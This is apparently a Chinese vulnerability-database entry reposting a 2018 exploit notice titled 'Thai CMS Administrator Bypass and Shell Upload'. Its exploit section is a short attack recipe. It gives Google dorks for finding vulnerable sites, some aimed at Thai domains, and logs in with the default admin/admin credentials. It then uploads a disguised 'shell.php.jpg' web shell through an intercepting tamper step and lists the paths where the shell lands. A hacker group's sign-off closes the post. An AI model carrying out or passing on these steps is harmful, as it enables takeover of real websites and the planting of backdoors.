Thai CMS Administrator Bypass and Shell Upload

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1034845 漏洞类型
发布时间 2018-06-01 更新时间 2018-06-01
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2018060015
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
############################################################## 
# Exploit Title: Thai CMS Administrator Bypass and Shell Upload
# Google Dork 1: inurl:/administrator/modules/mod_photo/
# Google Dork 2: inurl:path/administrator/admin.php site:.th
# Exploit Author: mr.Gh0st N@0b 
# Date: 1.6.2018  
# Tested on: Window 10 
################################################################ 
# POC
# Search with google dork
# Open url
# 
# Admin Panel
# localhost/administrator/admin.phpp
# localhost/path/administrator/admin.phpp
# 
# Bypass 
# username "admin" password"admin"
# Upload shell.php.jpg with Tamper
#
# Shell Path
# localhost/administrator/modules/mod_photo/myphoto/yourshell.php
# localhost/path/administrator/modules/mod_photo/myphoto/yourshell.php
##################################################### 
# mr.Gh0st N@0b
# Myanmar Noob Hackers 
# Greetz to All Myanmar Black Hats 
# https://www.facebook.com/official.myanmar.noob.hackers/ 
#####################################################